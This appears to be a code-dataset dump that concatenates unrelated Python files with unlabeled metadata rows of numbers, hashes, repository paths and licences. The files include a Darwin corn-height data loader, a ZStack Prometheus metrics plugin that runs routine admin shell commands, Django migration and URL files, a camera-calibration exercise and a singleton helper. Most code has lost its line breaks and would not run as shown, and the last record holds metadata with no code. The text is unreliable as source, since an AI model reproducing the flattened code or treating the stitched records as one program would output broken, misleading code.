# -*- coding: utf-8 -*- from __future__ import absolute_import from __future__ import division from __future__ import print_function import csv import numpy as np import os import sys from observations.util import maybe_download_and_extract def zea_mays(path): """Darwin's Heights of Cross- and Self-fertilized Zea May Pairs Darwin (1876) studied the growth of pairs of zea may (aka corn) seedlings, one produced by cross-fertilization and the other produced by self-fertilization, but otherwise grown under identical conditions. His goal was to demonstrate the greater vigour of the cross-fertilized plants. The data recorded are the final height (inches, to the nearest 1/8th) of the plants in each pair. In the *Design of Experiments*, Fisher (1935) used these data to illustrate a paired t-test (well, a one-sample test on the mean difference, `cross - self`). Later in the book (section 21), he used this data to illustrate an early example of a non-parametric permutation test, treating each paired difference as having (randomly) either a positive or negative sign. A data frame with 15 observations on the following 4 variables. `pair` pair number, a numeric vector `pot` pot, a factor with levels `1` `2` `3` `4` `cross` height of cross fertilized plant, a numeric vector `self` height of self fertilized plant, a numeric vector `diff` `cross - self` for each pair Darwin, C. (1876). *The Effect of Cross- and Self-fertilization in the Vegetable Kingdom*, 2nd Ed. London: John Murray. Andrews, D. and Herzberg, A. (1985) *Data: a collection of problems from many fields for the student and research worker*. New York: Springer. Data retrieved from: `https://www.stat.cmu.edu/StatDat/` Args: path: str. Path to directory which either stores file or otherwise file will be downloaded and extracted there. Filename is `zea_mays.csv`. Returns: Tuple of np.ndarray `x_train` with 15 rows and 5 columns and dictionary `metadata` of column headers (feature names). """ import pandas as pd path = os.path.expanduser(path) filename = 'zea_mays.csv' if not os.path.exists(os.path.join(path, filename)): url = 'http://dustintran.com/data/r/HistData/ZeaMays.csv' maybe_download_and_extract(path, url, save_file_name='zea_mays.csv', resume=False) data = pd.read_csv(os.path.join(path, filename), index_col=0, parse_dates=True) x_train = data.values metadata = {'columns': data.columns} return x_train, metadata
32.679012
74
0.705327
394
2,647
4.65736
0.532995
0.015259
0.026158
0.025068
0.055586
0
0
0
0
0
0
0.015934
0.217605
2,647
80
75
33.0875
0.870111
0.671326
0
0
0
0
0.101394
0
0
0
0
0
0
1
0.045455
false
0
0.409091
0
0.5
0.045455
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
5db6309005811059a99432092acd5ed62236c399
23,282
py
Python
kvmagent/kvmagent/plugins/prometheus.py
qianfei11/zstack-utility
e791bc6b6ae3a74e202f6fce84bde498c715aee8
[ "Apache-2.0" ]
null
null
null
kvmagent/kvmagent/plugins/prometheus.py
qianfei11/zstack-utility
e791bc6b6ae3a74e202f6fce84bde498c715aee8
[ "Apache-2.0" ]
null
null
null
kvmagent/kvmagent/plugins/prometheus.py
qianfei11/zstack-utility
e791bc6b6ae3a74e202f6fce84bde498c715aee8
[ "Apache-2.0" ]
null
null
null
import os.path import threading import typing from prometheus_client import start_http_server from prometheus_client.core import GaugeMetricFamily, REGISTRY from kvmagent import kvmagent from zstacklib.utils import http from zstacklib.utils import jsonobject from zstacklib.utils import lock from zstacklib.utils import lvm from zstacklib.utils import misc from zstacklib.utils import thread from zstacklib.utils.bash import * from zstacklib.utils.ip import get_nic_supported_max_speed logger = log.get_logger(__name__) collector_dict = {} # type: Dict[str, threading.Thread] latest_collect_result = {} collectResultLock = threading.RLock() QEMU_CMD = kvmagent.get_qemu_path().split("/")[-1] def read_number(fname): res = linux.read_file(fname) return 0 if not res else int(res) def collect_host_network_statistics(): all_eths = os.listdir("/sys/class/net/") virtual_eths = os.listdir("/sys/devices/virtual/net/") interfaces = [] for eth in all_eths: eth = eth.strip(' \t\n\r') if eth in virtual_eths: continue if eth == 'bonding_masters': continue elif not eth: continue else: interfaces.append(eth) all_in_bytes = 0 all_in_packets = 0 all_in_errors = 0 all_out_bytes = 0 all_out_packets = 0 all_out_errors = 0 for intf in interfaces: all_in_bytes += read_number("/sys/class/net/{}/statistics/rx_bytes".format(intf)) all_in_packets += read_number("/sys/class/net/{}/statistics/rx_packets".format(intf)) all_in_errors += read_number("/sys/class/net/{}/statistics/rx_errors".format(intf)) all_out_bytes += read_number("/sys/class/net/{}/statistics/tx_bytes".format(intf)) all_out_packets += read_number("/sys/class/net/{}/statistics/tx_packets".format(intf)) all_out_errors += read_number("/sys/class/net/{}/statistics/tx_errors".format(intf)) metrics = { 'host_network_all_in_bytes': GaugeMetricFamily('host_network_all_in_bytes', 'Host all inbound traffic in bytes'), 'host_network_all_in_packages': GaugeMetricFamily('host_network_all_in_packages', 'Host all inbound traffic in packages'), 'host_network_all_in_errors': GaugeMetricFamily('host_network_all_in_errors', 'Host all inbound traffic errors'), 'host_network_all_out_bytes': GaugeMetricFamily('host_network_all_out_bytes', 'Host all outbound traffic in bytes'), 'host_network_all_out_packages': GaugeMetricFamily('host_network_all_out_packages', 'Host all outbound traffic in packages'), 'host_network_all_out_errors': GaugeMetricFamily('host_network_all_out_errors', 'Host all outbound traffic errors'), } metrics['host_network_all_in_bytes'].add_metric([], float(all_in_bytes)) metrics['host_network_all_in_packages'].add_metric([], float(all_in_packets)) metrics['host_network_all_in_errors'].add_metric([], float(all_in_errors)) metrics['host_network_all_out_bytes'].add_metric([], float(all_out_bytes)) metrics['host_network_all_out_packages'].add_metric([], float(all_out_packets)) metrics['host_network_all_out_errors'].add_metric([], float(all_out_errors)) return metrics.values() def collect_host_capacity_statistics(): default_zstack_path = '/usr/local/zstack/apache-tomcat/webapps/zstack' zstack_env_path = os.environ.get('ZSTACK_HOME', None) if zstack_env_path and zstack_env_path != default_zstack_path: default_zstack_path = zstack_env_path zstack_dir = ['/var/lib/zstack', '%s/../../../' % default_zstack_path, '/opt/zstack-dvd/', '/var/log/zstack', '/var/lib/mysql', '/var/lib/libvirt', '/tmp/zstack'] metrics = { 'zstack_used_capacity_in_bytes': GaugeMetricFamily('zstack_used_capacity_in_bytes', 'ZStack used capacity in bytes') } zstack_used_capacity = 0 for dir in zstack_dir: if not os.path.exists(dir): continue cmd = "du -bs %s | awk {\'print $1\'}" % dir res = bash_o(cmd) zstack_used_capacity += int(res) metrics['zstack_used_capacity_in_bytes'].add_metric([], float(zstack_used_capacity)) return metrics.values() def collect_lvm_capacity_statistics(): metrics = { 'vg_size': GaugeMetricFamily('vg_size', 'volume group size', None, ['vg_name']), 'vg_avail': GaugeMetricFamily('vg_avail', 'volume group and thin pool free size', None, ['vg_name']), } r = bash_r("grep -Ev '^[[:space:]]*#|^[[:space:]]*$' /etc/multipath/wwids") if r == 0: linux.set_fail_if_no_path() r, o, e = bash_roe("vgs --nolocking --noheading -oname") if r != 0 or len(o.splitlines()) == 0: return metrics.values() vg_names = o.splitlines() for name in vg_names: name = name.strip() size, avail = lvm.get_vg_size(name, False) metrics['vg_size'].add_metric([name], float(size)) metrics['vg_avail'].add_metric([name], float(avail)) return metrics.values() def convert_raid_state_to_int(state): """ :type state: str """ state = state.lower() if state == "optimal": return 0 elif state == "degraded": return 5 else: return 100 def convert_disk_state_to_int(state): """ :type state: str """ state = state.lower() if "online" in state or "jobd" in state: return 0 elif "rebuild" in state: return 5 elif "failed" in state: return 10 elif "unconfigured" in state: return 15 else: return 100 def collect_raid_state(): metrics = { 'raid_state': GaugeMetricFamily('raid_state', 'raid state', None, ['target_id']), 'physical_disk_state': GaugeMetricFamily('physical_disk_state', 'physical disk state', None, ['slot_number', 'disk_group']), 'physical_disk_temperature': GaugeMetricFamily('physical_disk_temperature', 'physical disk temperature', None, ['slot_number', 'disk_group']), } if bash_r("/opt/MegaRAID/MegaCli/MegaCli64 -LDInfo -LALL -aAll") != 0: return metrics.values() raid_info = bash_o("/opt/MegaRAID/MegaCli/MegaCli64 -LDInfo -LALL -aAll | grep -E 'Target Id|State'").strip().splitlines() target_id = state = "unknown" for info in raid_info: if "Target Id" in info: target_id = info.strip().strip(")").split(" ")[-1] else: state = info.strip().split(" ")[-1] metrics['raid_state'].add_metric([target_id], convert_raid_state_to_int(state)) disk_info = bash_o( "/opt/MegaRAID/MegaCli/MegaCli64 -PDList -aAll | grep -E 'Slot Number|DiskGroup|Firmware state|Drive Temperature'").strip().splitlines() slot_number = state = disk_group = "unknown" for info in disk_info: if "Slot Number" in info: slot_number = info.strip().split(" ")[-1] elif "DiskGroup" in info: kvs = info.replace("Drive's position: ", "").split(",") disk_group = filter(lambda x: "DiskGroup" in x, kvs)[0] disk_group = disk_group.split(" ")[-1] elif "Drive Temperature" in info: temp = info.split(":")[1].split("C")[0] metrics['physical_disk_temperature'].add_metric([slot_number, disk_group], int(temp)) else: disk_group = "JBOD" if disk_group == "unknown" and info.count("JBOD") > 0 else disk_group disk_group = "unknown" if disk_group is None else disk_group state = info.strip().split(":")[-1] metrics['physical_disk_state'].add_metric([slot_number, disk_group], convert_disk_state_to_int(state)) return metrics.values() def collect_equipment_state(): metrics = { 'power_supply': GaugeMetricFamily('power_supply', 'power supply', None, ['ps_id']), 'ipmi_status': GaugeMetricFamily('ipmi_status', 'ipmi status', None, []), 'physical_network_interface': GaugeMetricFamily('physical_network_interface', 'physical network interface', None, ['interface_name', 'speed']), } r, ps_info = bash_ro("ipmitool sdr type 'power supply'") # type: (int, str) if r == 0: for info in ps_info.splitlines(): info = info.strip() ps_id = info.split("|")[0].strip().split(" ")[0] health = 10 if "fail" in info.lower() or "lost" in info.lower() else 0 metrics['power_supply'].add_metric([ps_id], health) metrics['ipmi_status'].add_metric([], bash_r("ipmitool mc info")) nics = bash_o("find /sys/class/net -type l -not -lname '*virtual*' -printf '%f\\n'").splitlines() if len(nics) != 0: for nic in nics: nic = nic.strip() try: # NOTE(weiw): sriov nic contains carrier file but can not read status = linux.read_file("/sys/class/net/%s/carrier" % nic) == 1 except Exception as e: status = True speed = str(get_nic_supported_max_speed(nic)) metrics['physical_network_interface'].add_metric([nic, speed], status) return metrics.values() def collect_vm_statistics(): metrics = { 'cpu_occupied_by_vm': GaugeMetricFamily('cpu_occupied_by_vm', 'Percentage of CPU used by vm', None, ['vmUuid']) } r, pid_vm_map_str = bash_ro("ps --no-headers u -C \"%s -name\" | awk '{print $2,$13}'" % QEMU_CMD) if r != 0 or len(pid_vm_map_str.splitlines()) == 0: return metrics.values() pid_vm_map_str = pid_vm_map_str.replace(",debug-threads=on", "").replace("guest=", "") '''pid_vm_map_str samples: 38149 e8e6f27bfb2d47e08c59cbea1d0488c3 38232 afa02edca7eb4afcb5d2904ac1216eb1 ''' pid_vm_map = {} for pid_vm in pid_vm_map_str.splitlines(): arr = pid_vm.split() if len(arr) == 2: pid_vm_map[arr[0]] = arr[1] def collect(vm_pid_arr): vm_pid_arr_str = ','.join(vm_pid_arr) r, pid_cpu_usages_str = bash_ro("top -b -n 1 -p %s | grep qemu | awk '{print $1,$9}'" % vm_pid_arr_str) if r != 0 or len(pid_cpu_usages_str.splitlines()) == 0: return for pid_cpu_usage in pid_cpu_usages_str.splitlines(): arr = pid_cpu_usage.split() pid = arr[0] vm_uuid = pid_vm_map[pid] cpu_usage = arr[1] metrics['cpu_occupied_by_vm'].add_metric([vm_uuid], float(cpu_usage)) n = 10 for i in range(0, len(pid_vm_map.keys()), n): collect(pid_vm_map.keys()[i:i + n]) return metrics.values() collect_node_disk_wwid_last_time = None collect_node_disk_wwid_last_result = None def collect_node_disk_wwid(): global collect_node_disk_wwid_last_time global collect_node_disk_wwid_last_result # NOTE(weiw): some storage can not afford frequent TUR. ref: ZSTAC-23416 if collect_node_disk_wwid_last_time is None: collect_node_disk_wwid_last_time = time.time() elif time.time() - collect_node_disk_wwid_last_time < 60 and collect_node_disk_wwid_last_result is not None: return collect_node_disk_wwid_last_result metrics = { 'node_disk_wwid': GaugeMetricFamily('node_disk_wwid', 'node disk wwid', None, ["disk", "wwid"]) } pvs = bash_o("pvs --nolocking --noheading -o pv_name").strip().splitlines() for pv in pvs: multipath_wwid = None if bash_r("dmsetup table %s | grep multipath" % pv) == 0: multipath_wwid = bash_o("udevadm info -n %s | grep -E '^S: disk/by-id/dm-uuid' | awk -F '-' '{print $NF}'" % pv).strip() disks = linux.get_physical_disk(pv, False) for disk in disks: disk_name = disk.split("/")[-1].strip() wwids = bash_o("udevadm info -n %s | grep -E '^S: disk/by-id' | awk -F '/' '{print $NF}' | grep -v '^lvm-pv' | sort" % disk).strip().splitlines() if multipath_wwid is not None: wwids.append(multipath_wwid) if len(wwids) > 0: metrics['node_disk_wwid'].add_metric([disk_name, ";".join([w.strip() for w in wwids])], 1) collect_node_disk_wwid_last_result = metrics.values() return metrics.values() kvmagent.register_prometheus_collector(collect_host_network_statistics) kvmagent.register_prometheus_collector(collect_host_capacity_statistics) kvmagent.register_prometheus_collector(collect_vm_statistics) kvmagent.register_prometheus_collector(collect_node_disk_wwid) if misc.isMiniHost(): kvmagent.register_prometheus_collector(collect_lvm_capacity_statistics) kvmagent.register_prometheus_collector(collect_raid_state) kvmagent.register_prometheus_collector(collect_equipment_state) class PrometheusPlugin(kvmagent.KvmAgent): COLLECTD_PATH = "/prometheus/collectdexporter/start" @kvmagent.replyerror @in_bash def start_prometheus_exporter(self, req): @in_bash def start_collectd(cmd): conf_path = os.path.join(os.path.dirname(cmd.binaryPath), 'collectd.conf') conf = '''Interval {{INTERVAL}} # version {{VERSION}} FQDNLookup false LoadPlugin syslog LoadPlugin aggregation LoadPlugin cpu LoadPlugin disk LoadPlugin interface LoadPlugin memory LoadPlugin network LoadPlugin virt <Plugin aggregation> <Aggregation> #Host "unspecified" Plugin "cpu" #PluginInstance "unspecified" Type "cpu" #TypeInstance "unspecified" GroupBy "Host" GroupBy "TypeInstance" CalculateNum false CalculateSum false CalculateAverage true CalculateMinimum false CalculateMaximum false CalculateStddev false </Aggregation> </Plugin> <Plugin cpu> ReportByCpu true ReportByState true ValuesPercentage true </Plugin> <Plugin disk> Disk "/^sd[a-z]$/" Disk "/^hd[a-z]$/" Disk "/^vd[a-z]$/" IgnoreSelected false </Plugin> <Plugin "interface"> {% for i in INTERFACES -%} Interface "{{i}}" {% endfor -%} IgnoreSelected false </Plugin> <Plugin memory> ValuesAbsolute true ValuesPercentage false </Plugin> <Plugin virt> Connection "qemu:///system" RefreshInterval {{INTERVAL}} HostnameFormat name PluginInstanceFormat name BlockDevice "/:hd[a-z]/" IgnoreSelected true ExtraStats "vcpu memory" </Plugin> <Plugin network> Server "localhost" "25826" </Plugin> ''' tmpt = Template(conf) conf = tmpt.render({ 'INTERVAL': cmd.interval, 'INTERFACES': interfaces, 'VERSION': cmd.version, }) need_restart_collectd = False if os.path.exists(conf_path): with open(conf_path, 'r') as fd: old_conf = fd.read() if old_conf != conf: with open(conf_path, 'w') as fd: fd.write(conf) need_restart_collectd = True else: with open(conf_path, 'w') as fd: fd.write(conf) need_restart_collectd = True cpid = linux.find_process_by_command('collectd', [conf_path]) mpid = linux.find_process_by_command('collectdmon', [conf_path]) if not cpid: bash_errorout('collectdmon -- -C %s' % conf_path) else: bash_errorout('kill -TERM %s' % cpid) if need_restart_collectd: if not mpid: bash_errorout('collectdmon -- -C %s' % conf_path) else: bash_errorout('kill -HUP %s' % mpid) else: if not mpid: bash_errorout('collectdmon -- -C %s' % conf_path) def run_in_systemd(binPath, args, log): def get_systemd_name(path): if "collectd_exporter" in path: return "collectd_exporter" elif "node_exporter" in path: return "node_exporter" elif "pushgateway" in path: return "pushgateway" def reload_and_restart_service(service_name): bash_errorout("systemctl daemon-reload && systemctl restart %s.service" % service_name) service_name = get_systemd_name(binPath) service_path = '/etc/systemd/system/%s.service' % service_name service_conf = ''' [Unit] Description=prometheus %s After=network.target [Service] ExecStart=/bin/sh -c '%s %s > %s 2>&1' ExecStop=/bin/sh -c 'pkill -TERM -f %s' Restart=always RestartSec=30s [Install] WantedBy=multi-user.target ''' % (service_name, binPath, args, '/dev/null' if log.endswith('/pushgateway.log') else log, binPath) if not os.path.exists(service_path): linux.write_file(service_path, service_conf, True) os.chmod(service_path, 0644) reload_and_restart_service(service_name) return if linux.read_file(service_path) != service_conf: linux.write_file(service_path, service_conf, True) logger.info("%s.service conf changed" % service_name) os.chmod(service_path, 0644) # restart service regardless of conf changes, for ZSTAC-23539 reload_and_restart_service(service_name) @lock.file_lock("/run/collectd-conf.lock", locker=lock.Flock()) def start_collectd_exporter(cmd): start_collectd(cmd) start_exporter(cmd) @in_bash def start_exporter(cmd): EXPORTER_PATH = cmd.binaryPath LOG_FILE = os.path.join(os.path.dirname(EXPORTER_PATH), cmd.binaryPath + '.log') ARGUMENTS = cmd.startupArguments if not ARGUMENTS: ARGUMENTS = "" os.chmod(EXPORTER_PATH, 0o755) run_in_systemd(EXPORTER_PATH, ARGUMENTS, LOG_FILE) para = jsonobject.loads(req[http.REQUEST_BODY]) rsp = kvmagent.AgentResponse() eths = bash_o("ls /sys/class/net").split() interfaces = [] for eth in eths: eth = eth.strip(' \t\n\r') if eth == 'lo': continue if eth == 'bonding_masters': continue elif eth.startswith('vnic'): continue elif eth.startswith('outer'): continue elif eth.startswith('br_'): continue elif not eth: continue else: interfaces.append(eth) for cmd in para.cmds: if "collectd_exporter" in cmd.binaryPath: start_collectd_exporter(cmd) else: start_exporter(cmd) return jsonobject.dumps(rsp) def install_colletor(self): class Collector(object): __collector_cache = {} @classmethod def __get_cache__(cls): # type: () -> list keys = cls.__collector_cache.keys() if keys is None or len(keys) == 0: return None if (time.time() - keys[0]) < 9: return cls.__collector_cache.get(keys[0]) return None @classmethod def __store_cache__(cls, ret): # type: (list) -> None cls.__collector_cache.clear() cls.__collector_cache.update({time.time(): ret}) @classmethod def check(cls, v): try: if v is None: return False if isinstance(v, GaugeMetricFamily): return Collector.check(v.samples) if isinstance(v, list) or isinstance(v, tuple): for vl in v: if Collector.check(vl) is False: return False if isinstance(v, dict): for vk in v.iterkeys(): if vk == "timestamp" or vk == "exemplar": continue if Collector.check(v[vk]) is False: return False except Exception as e: logger.warn("got exception in check value %s: %s" % (v, e)) return True return True def collect(self): global latest_collect_result ret = [] def get_result_run(f, fname): # type: (typing.Callable, str) -> None global collectResultLock global latest_collect_result r = f() if not Collector.check(r): logger.warn("result from collector %s contains illegal character None, details: \n%s" % (fname, r)) return with collectResultLock: latest_collect_result[fname] = r cache = Collector.__get_cache__() if cache is not None: return cache for c in kvmagent.metric_collectors: name = "%s.%s" % (c.__module__, c.__name__) if collector_dict.get(name) is not None and collector_dict.get(name).is_alive(): continue collector_dict[name] = thread.ThreadFacade.run_in_thread(get_result_run, (c, name,)) for i in range(7): for t in collector_dict.values(): if t.is_alive(): time.sleep(0.5) continue for k in collector_dict.iterkeys(): if collector_dict[k].is_alive(): logger.warn("It seems that the collector [%s] has not been completed yet," " temporarily use the last calculation result." % k) for v in latest_collect_result.itervalues(): ret.extend(v) Collector.__store_cache__(ret) return ret REGISTRY.register(Collector()) def start(self): http_server = kvmagent.get_http_server() http_server.register_async_uri(self.COLLECTD_PATH, self.start_prometheus_exporter) self.install_colletor() start_http_server(7069) def stop(self): pass
36.492163
157
0.583541
2,701
23,282
4.779341
0.171788
0.017042
0.019521
0.017662
0.296692
0.17972
0.103029
0.055078
0.043613
0.032458
0
0.009802
0.307663
23,282
637
158
36.549451
0.791054
0.013616
0
0.200787
0
0.011811
0.229337
0.058454
0
0
0
0
0
0
null
null
0.001969
0.027559
null
null
0.011811
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
5dba0da51e77fecfd4eb4bbfdb42e2e652206d09
1,322
py
Python
core/migrations/0011_itemvariation_variation.py
manulangat1/djcommerce
2cd92631479ef949e0f05a255f2f50feca728802
[ "MIT" ]
1
2020-02-08T16:29:41.000Z
2020-02-08T16:29:41.000Z
core/migrations/0011_itemvariation_variation.py
manulangat1/djcommerce
2cd92631479ef949e0f05a255f2f50feca728802
[ "MIT" ]
15
2020-05-04T13:22:32.000Z
2022-03-12T00:27:28.000Z
core/migrations/0011_itemvariation_variation.py
manulangat1/djcommerce
2cd92631479ef949e0f05a255f2f50feca728802
[ "MIT" ]
1
2020-10-17T08:54:31.000Z
2020-10-17T08:54:31.000Z
# Generated by Django 2.2.6 on 2020-02-09 12:24 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('core', '0010_auto_20200130_1135'), ] operations = [ migrations.CreateModel( name='Variation', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=50)), ('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.Item')), ], options={ 'unique_together': {('item', 'name')}, }, ), migrations.CreateModel( name='ItemVariation', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('value', models.CharField(max_length=50)), ('attachment', models.ImageField(upload_to='variations/')), ('variation', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.Variation')), ], options={ 'unique_together': {('variation', 'value')}, }, ), ]
34.789474
115
0.555219
126
1,322
5.698413
0.452381
0.044568
0.058496
0.091922
0.456825
0.384401
0.384401
0.384401
0.384401
0.384401
0
0.037716
0.298033
1,322
37
116
35.72973
0.735991
0.034039
0
0.387097
1
0
0.137255
0.018039
0
0
0
0
0
1
0
false
0
0.064516
0
0.16129
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
5dbe1aa985f0f74b54e5721ad988a0ced87ead89
469
py
Python
mygallary/urls.py
mangowilliam/my_gallary
4c87fe055e5c28d6ca6a27ea5bde7df380750006
[ "MIT" ]
null
null
null
mygallary/urls.py
mangowilliam/my_gallary
4c87fe055e5c28d6ca6a27ea5bde7df380750006
[ "MIT" ]
6
2021-03-19T02:06:21.000Z
2022-03-11T23:53:21.000Z
mygallary/urls.py
mangowilliam/my_gallary
4c87fe055e5c28d6ca6a27ea5bde7df380750006
[ "MIT" ]
null
null
null
from django.conf import settings from django.conf.urls.static import static from django.conf.urls import url from . import views urlpatterns = [ url('^$', views.gallary,name = 'gallary'), url(r'^search/', views.search_image, name='search_image'), url(r'^details/(\d+)',views.search_location,name ='images') ] if settings.DEBUG: urlpatterns+= static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)
20.391304
81
0.656716
58
469
5.206897
0.413793
0.099338
0.139073
0.119205
0
0
0
0
0
0
0
0
0.211087
469
23
82
20.391304
0.816216
0
0
0
0
0
0.104255
0
0
0
0
0
0
1
0
false
0
0.363636
0
0.363636
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
5dc01810c4c1797d877a743bdf67e61535eee657
1,914
py
Python
exercise_2/exercise_2.1.py
lukaszbinden/ethz-iacv-2020
271de804315de98b816cda3e2498958ffa87ad59
[ "MIT" ]
null
null
null
exercise_2/exercise_2.1.py
lukaszbinden/ethz-iacv-2020
271de804315de98b816cda3e2498958ffa87ad59
[ "MIT" ]
null
null
null
exercise_2/exercise_2.1.py
lukaszbinden/ethz-iacv-2020
271de804315de98b816cda3e2498958ffa87ad59
[ "MIT" ]
null
null
null
camera_width = 640 camera_height = 480 film_back_width = 1.417 film_back_height = 0.945 x_center = 320 y_center = 240 P_1 = (-0.023, -0.261, 2.376) p_11 = P_1[0] p_12 = P_1[1] p_13 = P_1[2] P_2 = (0.659, -0.071, 2.082) p_21 = P_2[0] p_22 = P_2[1] p_23 = P_2[2] p_1_prime = (52, 163) x_1 = p_1_prime[0] y_1 = p_1_prime[1] p_2_prime = (218, 216) x_2 = p_2_prime[0] y_2 = p_2_prime[1] f = 1.378 k_x = camera_width / film_back_width k_y = camera_height / film_back_height # f_k_x = f * k_x f_k_x = f # f_k_y = f * k_y f_k_y = f u_1_prime = (x_1 - x_center) / k_x v_1_prime = (y_1 - y_center) / k_y u_2_prime = (x_2 - x_center) / k_x v_2_prime = (y_2 - y_center) / k_y c_1_prime = (f_k_x * p_21 + (p_13 - p_23) * u_2_prime - u_2_prime/u_1_prime * f_k_x * p_11) / (f_k_x * (1 - u_2_prime/u_1_prime)) c_2_prime = (f_k_y * p_22 - (p_23 - (p_13*u_1_prime - f_k_x*(p_11 - c_1_prime))/u_1_prime) * v_2_prime) / f_k_y c_2_prime_alt = (f_k_y * p_12 - (p_13 - (p_13*u_1_prime - f_k_x*(p_11 - c_1_prime))/u_1_prime) * v_1_prime) / f_k_y c_3_prime = p_13 - (f_k_x / u_1_prime) * (p_11 - c_1_prime) rho_1_prime = p_13 - c_3_prime rho_2_prime = p_23 - c_3_prime print(f"C' = ({c_1_prime}, {c_2_prime}, {c_3_prime})") print(f"c_2_prime_alt = {c_2_prime_alt}") print(f"rho_1_prime = {rho_1_prime}") print(f"rho_2_prime = {rho_2_prime}") print("------------------") r_11 = f_k_x * (p_11 - c_1_prime) r_12 = f_k_y * (p_12 - c_2_prime) r_13 = 1 * (p_13 - c_3_prime) l_11 = rho_1_prime * u_1_prime l_12 = rho_1_prime * v_1_prime l_13 = rho_1_prime * 1 print(f"L: ({l_11}, {l_12}, {l_13})") print(f"R: ({r_11}, {r_12}, {r_13})") print("------------------") r_21 = f_k_x * (p_21 - c_1_prime) r_22 = f_k_y * (p_22 - c_2_prime) r_23 = 1 * (p_23 - c_3_prime) l_21 = rho_2_prime * u_2_prime l_22 = rho_2_prime * v_2_prime l_23 = rho_2_prime * 1 print(f"L: ({l_11}, {l_12}, {l_13})") print(f"R: ({r_11}, {r_12}, {r_13})")
23.060241
129
0.642633
484
1,914
2.02686
0.097107
0.171254
0.033639
0.024465
0.455657
0.247706
0.187564
0.167176
0.140673
0.140673
0
0.159091
0.172414
1,914
83
130
23.060241
0.460227
0.016196
0
0.105263
0
0
0.145213
0
0
0
0
0
0
1
0
false
0
0
0
0
0.175439
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
5dc1607dc008e8af7451051e5d28ffb9f945411a
998
py
Python
apps/zsh/singletons.py
codecat555/codecat555-fidgetingbits_knausj_talon
62f9be0459e6631c99d58eee97054ddd970cc5f3
[ "MIT" ]
4
2021-02-04T07:36:05.000Z
2021-07-03T06:53:30.000Z
apps/zsh/singletons.py
codecat555/codecat555-fidgetingbits_knausj_talon
62f9be0459e6631c99d58eee97054ddd970cc5f3
[ "MIT" ]
null
null
null
apps/zsh/singletons.py
codecat555/codecat555-fidgetingbits_knausj_talon
62f9be0459e6631c99d58eee97054ddd970cc5f3
[ "MIT" ]
null
null
null
# A rarely-updated module to assist in writing reload-safe talon modules using # things like threads, which are not normally safe for reloading with talon. # If this file is ever updated, you'll need to restart talon. import logging _singletons = {} def singleton(fn): name = f"{fn.__module__}.{fn.__name__}" # Do any cleanup actions from before. if name in _singletons: old = _singletons.pop(name) try: next(old) except StopIteration: pass else: logging.error( f"the old @singleton function {name} had more than one yield!" ) # Do the startup actions on the new object. it = iter(fn()) obj = next(it) # Remember the iterator so we can call the cleanup actions later. _singletons[name] = it # We want the object yielded by the iterator to be available at the name # of the function, so instead of returning a function we return an object. return obj
28.514286
78
0.645291
140
998
4.514286
0.621429
0.018987
0
0
0
0
0
0
0
0
0
0
0.288577
998
34
79
29.352941
0.890141
0.497996
0
0
0
0
0.179226
0.059063
0
0
0
0
0
1
0.055556
false
0.055556
0.055556
0
0.166667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
5dc4b2786f8172c270a1fc651693530424b90630
190
py
Python
python_program/condition.py
LiuKaiqiang94/PyStudyExample
b30212718b218c71e06b68677f55c33e3a1dbf46
[ "MIT" ]
5
2018-09-10T02:52:35.000Z
2018-09-20T07:50:42.000Z
python_program/condition.py
LiuKaiqiang94/PyStudyExample
b30212718b218c71e06b68677f55c33e3a1dbf46
[ "MIT" ]
null
null
null
python_program/condition.py
LiuKaiqiang94/PyStudyExample
b30212718b218c71e06b68677f55c33e3a1dbf46
[ "MIT" ]
null
null
null
def main(): val=int(input("input a num")) if val<10: print("A") elif val<20: print("B") elif val<30: print("C") else: print("D") main()
13.571429
33
0.442105
27
190
3.111111
0.62963
0.166667
0
0
0
0
0
0
0
0
0
0.05042
0.373684
190
13
34
14.615385
0.655462
0
0
0
0
0
0.079365
0
0
0
0
0
0
1
0.090909
false
0
0
0
0.090909
0.363636
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
5dc789560fb397b3832cccec69534dcbf26e36d2
5,902
py
Python
emilia/modules/math.py
masterisira/ELIZA_OF-master
02a7dbf48e4a3d4ee0981e6a074529ab1497aafe
[ "Unlicense" ]
null
null
null
emilia/modules/math.py
masterisira/ELIZA_OF-master
02a7dbf48e4a3d4ee0981e6a074529ab1497aafe
[ "Unlicense" ]
null
null
null
emilia/modules/math.py
masterisira/ELIZA_OF-master
02a7dbf48e4a3d4ee0981e6a074529ab1497aafe
[ "Unlicense" ]
null
null
null
